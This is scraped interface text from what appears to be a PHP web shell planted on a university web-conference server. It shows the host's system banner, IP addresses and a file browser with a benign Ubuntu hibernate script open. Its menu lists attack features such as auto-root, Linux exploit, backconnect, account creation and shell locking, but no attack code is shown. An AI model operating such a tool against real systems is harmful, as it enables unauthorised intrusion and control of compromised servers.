Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 18.221.165.190
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
etc /
pm /
sleep.d /
[ HOME SHELL ]
Name
Size
Permission
Action
10_grub-common
210
B
-rwxr-xr-x
10_unattended-upgrades-hiberna...
672
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 10_unattended-upgrades-hibernate
#!/bin/sh # Action script ensure that unattended-upgrades is finished # before a hibernate # # Copyright: Copyright (c) 2009 Michael Vogt # License: GPL-2 # PATH=/sbin:/usr/sbin:/bin:/usr/bin SHUTDOWN_HELPER=/usr/share/unattended-upgrades/unattended-upgrade-shutdown if [ -x /usr/bin/python3 ]; then PYTHON=python3 else PYTHON=python fi if [ ! -x /usr/share/unattended-upgrades/unattended-upgrade-shutdown ]; then exit 0 fi case "${1}" in hibernate) if [ -e $SHUTDOWN_HELPER ]; then $PYTHON $SHUTDOWN_HELPER --stop-only fi ;; resume|thaw) # nothing ;; esac
Close